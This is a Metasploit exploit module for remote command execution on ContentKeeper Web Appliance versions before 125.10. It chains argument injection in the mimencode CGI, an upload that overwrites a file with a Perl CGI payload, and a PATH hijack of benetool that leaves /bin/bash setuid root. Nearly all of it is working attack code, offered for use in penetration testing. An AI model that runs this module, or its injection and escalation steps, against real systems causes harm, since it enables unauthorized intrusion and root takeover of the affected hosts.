##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
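class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # Raw TCP rather than HttpClient: both requests are hand-built below because
  # the mimencode argument injection lives in the query string.
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ContentKeeper Web Remote Command Execution',
        'Description' => %q{
          This module exploits the ContentKeeper Web Appliance. Versions prior
          to 125.10 are affected. This module exploits a combination of weaknesses
          to enable remote command execution as the Apache user. By setting
          SkipEscalation to false, this module will attempt to setuid the bash shell.
        },
        'Author' => [ 'aushack' ],
        'Arch' => [ ARCH_CMD ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2009-20011' ],
          [ 'OSVDB', '54551' ],
          [ 'OSVDB', '54552' ],
          [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
        ],
        'Privileged' => false,
        'Payload' => {
          'DisableNops' => true,
          'Space' => 1024,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
        'Platform' => ['unix'],
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'DisclosureDate' => '2009-02-25',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          # The module overwrites OVERWRITE under /cgi-bin/ck/ with the payload
          # script, both requests land in the web server's access log, and unless
          # SkipEscalation is set it leaves /bin/bash setuid root. None of this is
          # undone automatically; see the cleanup reminder printed after exploitation.
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        # Inserted verbatim into the query string and request path (no URL
        # encoding), so keep it to a plain file name inside /cgi-bin/ck/.
        OptString.new('OVERWRITE', [ true, "The target file to upload our payload (spamkeeper.dat, bak.txt, formdate.pl etc)", 'spamkeeper.dat']),
        OptBool.new("SkipEscalation", [true, "Specify this to skip the root escalation attempt", false]),
      ]
    )
  end

  # Probes /cgi-bin/ck/mimencode with a bare GET. An HTTP 500 is taken as the
  # CGI being present (it errors without its expected arguments). That is a
  # heuristic, not proof that the argument injection works, so it is reported
  # as Appears rather than Vulnerable; no reply within the timeout is Unknown
  # rather than a false Safe. The socket is always released, even on error.
  def check
    connect
    sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")
    banner = sock.get_once(-1, 3)

    return Exploit::CheckCode::Unknown if banner.nil?
    return Exploit::CheckCode::Appears if banner =~ /500 Internal/

    Exploit::CheckCode::Safe
  ensure
    disconnect
  end

  # Two-step exploitation:
  #   1. POST the base64-encoded Perl CGI to mimencode with injected arguments
  #      "-u -o <OVERWRITE>", which decodes the body into a file inside the CGI
  #      directory (overwriting whatever was there).
  #   2. GET that file so Apache executes it as a CGI, running the payload.
  # Neither HTTP response is read, so an upload failure is only noticed when no
  # session appears. Nothing is restored on the target afterwards.
  def exploit
    exp = build_cgi_script

    body = Rex::Text.encode_base64(exp)

    connect

    # Argument injection: the query string becomes mimencode's argv.
    sploit = "POST /cgi-bin/ck/mimencode?-u+-o+#{datastore['OVERWRITE']} HTTP/1.1\r\n"
    sploit << "Host: #{datastore['RHOST']}\r\n"
    sploit << "Content-Length: #{body.length}\r\n\r\n"

    print_status("Uploading payload to target...")
    # The trailing CRLFCRLF is sent beyond Content-Length; the CGI ignores it.
    sock.put(sploit + body + "\r\n\r\n")
    disconnect

    select(nil, nil, nil, 3) # Wait a few seconds..
    print_status("Calling payload...")
    connect
    req = "GET /cgi-bin/ck/#{datastore['OVERWRITE']} HTTP/1.1\r\n" # Almost all files are owned by root, chmod'ed 777 :) rwx
    req << "Host: #{datastore['RHOST']}\r\n"
    sock.put(req + "\r\n\r\n")

    handler
    disconnect
    select(nil, nil, nil, 3) # Wait for session creation.

    # Only session creation is observable here; whether the setuid step inside
    # the script actually succeeded is not verified, so say so explicitly.
    if !datastore['SkipEscalation'] && session_created? && datastore['PAYLOAD'] =~ /perl/
      print_status("Session created; the root escalation step ran as part of the payload but its result is not verified.")
      print_status("If it succeeded, /bin/bash is now root setuid! Type 'bash -p' to get root.")
      print_status("Don't forget to clean up afterwards (chmod -s /bin/bash and restore an original copy of the OVERWRITE file).")
    end
  end

  private

  # Builds the Perl CGI that will be written to OVERWRITE and executed by Apache.
  # Perl payloads are spliced in directly (the "perl -MIO -e" wrapper and its
  # quotes are stripped because we are already inside a Perl script) and may be
  # preceded by the root-escalation step; any other cmd payload is wrapped in a
  # system() call. The escalation step is only embedded for Perl payloads, so a
  # warning is printed when it is requested with another payload type.
  def build_cgi_script
    exp = "#!/usr/bin/perl\n"
    exp << "print \"Content-type: text/html\\n\\n\";\n\n"
    exp << "use IO::Socket::INET;\n"

    if datastore['PAYLOAD'] =~ /perl/
      unless datastore['SkipEscalation']
        print_status("Attempting to facilitate root escalation...")
        # Drops a fake 'ps' into the CGI directory and prepends '.' to PATH before
        # invoking benetool, which then runs our 'ps' instead of the real one.
        # Relies on benetool being privileged; the setuid bit is left on /bin/bash.
        exp << %q{ system("echo /bin/chmod u+s /bin/bash > ps; /bin/chmod o+x ps; PATH=.:$PATH; ./benetool stopall;"); } # We can use either 'ps' or 'grep' but ps is fine.
      end
      exp << payload.encoded.gsub('perl -MIO -e ', '').gsub('\'', '') # We're already inside a perl script!
    else
      unless datastore['SkipEscalation']
        print_warning("SkipEscalation is false but the root escalation step is only embedded for perl payloads; skipping it.")
      end
      exp << "system(\""
      exp << payload.encoded.gsub('"', '\"')
      exp << "\");\n"
    end

    exp
  end
end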